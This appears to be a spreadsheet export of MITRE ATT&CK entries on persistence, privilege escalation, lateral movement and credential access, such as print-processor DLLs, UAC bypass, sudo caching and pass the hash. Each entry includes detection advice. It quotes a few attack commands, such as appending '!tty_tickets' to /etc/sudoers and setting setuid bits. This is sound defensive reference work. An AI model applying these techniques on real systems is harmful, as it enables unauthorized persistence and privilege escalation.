    <t>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. 
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Plist Modification</t>
  </si>
  <si>
    <t>Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, &lt;code&gt;Info.plist&lt;/code&gt;, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) 
Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; key combined with a path to a malicious dylib under the &lt;code&gt;EnvironmentVariables&lt;/code&gt; key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the &lt;code&gt;LSEnvironment&lt;/code&gt; key in the application's &lt;code&gt;Info.plist&lt;/code&gt; file.(Citation: wardle artofmalware volume1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/011</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for common command-line editors used to modify plist files located in auto-run locations, such as &lt;code&gt;~/LaunchAgents&lt;/code&gt;, &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;, and an application's &lt;code&gt;Info.plist&lt;/code&gt;. 
Monitor for plist file modification immediately followed by code execution from &lt;code&gt;~/Library/Scripts&lt;/code&gt; and &lt;code&gt;~/Library/Preferences&lt;/code&gt;. Also, monitor for significant changes to any path pointers in a modified plist.
Identify new services executed from plist modified in the previous user's session. </t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Print Processors</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. 
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>05 October 2020</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.</t>
  </si>
  <si>
    <t>Mathieu Tartare, ESET</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: XDG Autostart Entries</t>
  </si>
  <si>
    <t>Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; or &lt;code&gt;~/.config/autostart&lt;/code&gt; directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)
Within an XDG autostart entry file, the &lt;code&gt;Type&lt;/code&gt; key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The &lt;code&gt;Name&lt;/code&gt; key indicates an arbitrary name assigned by the creator and the &lt;code&gt;Exec&lt;/code&gt; key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>10 September 2019</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Active Setup</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>18 December 2020</t>
  </si>
  <si>
    <t>05 March 2021</t>
  </si>
  <si>
    <t>Monitor Registry key additions and/or modifications to &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt;.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Bencherchali Nasreddine, @nas_bench, ELIT Security Team (DSSD)</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Login Items</t>
  </si>
  <si>
    <t>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>05 October 2021</t>
  </si>
  <si>
    <t>All login items created via shared file lists are viewable by using the System Preferences GUI or in the &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt; file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.
Otherwise, login Items are located in &lt;code&gt;Contents/Library/LoginItems&lt;/code&gt; within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)
Monitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>30 January 2020</t>
  </si>
  <si>
    <t>22 July 2020</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
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
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Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Setuid and Setgid</t>
  </si>
  <si>
    <t>An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: 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</si>
  <si>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 (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</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</si>
  <si>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</si>
  <si>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Casey Smith; Stefan Kanthak</t>
  </si>
  <si>
    <t>Windows User Account Control</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Sudo and Sudo Caching</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt; (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Abuse Elevation Control Mechanism: Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being executed. MacOS system logs may also indicate when &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Erika Noerenberg, @gutterchurl, Carbon Black; Jimmy Astle, @AstleJimmy, Carbon Black</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)
Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>Defense Evasion, Lateral Movement</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</si>
  <si>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</si>
  <si>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Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Application Access Token</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.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that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>02 September 2021</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Hash</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/002</t>
  </si>
  <si>
    <t>31 August 2021</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</si>
  <si>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</si>
  <si>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Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Ticket</t>
  </si>
  <si>
    <t>Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)
A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)
A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/003</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</si>
  <si>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</si>
  <si>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Ryan Becwar; Vincent Le Toux</t>
  </si>
  <si>
    <t>Kerberos authentication enabled</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Web Session Cookie</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>12 October 2021</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Jen Burns, HubSpot; Johann Rehberger</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment,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
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
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
Additionally, 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</si>
  <si>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Unsecured Credentials: Credentials In Files</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/001</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</si>
  <si>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</si>
  <si>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Jay Chen, Palo Alto Networks; Microsoft Threat Intelligence Center (MSTIC); Rory McCune, Aqua Security; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Access to files</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials in Registry</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>07 February 2020</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys.</t>
  </si>
  <si>
    <t>Unsecured Credentials: Bash History</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</si>
  <si>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Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Unsecured Credentials: Private Keys</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</si>
  <si>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These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/004</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</si>
  <si>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t>
  </si>
  <si>
    <t>Unsecured Credentials: Cloud Instance Metadata API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
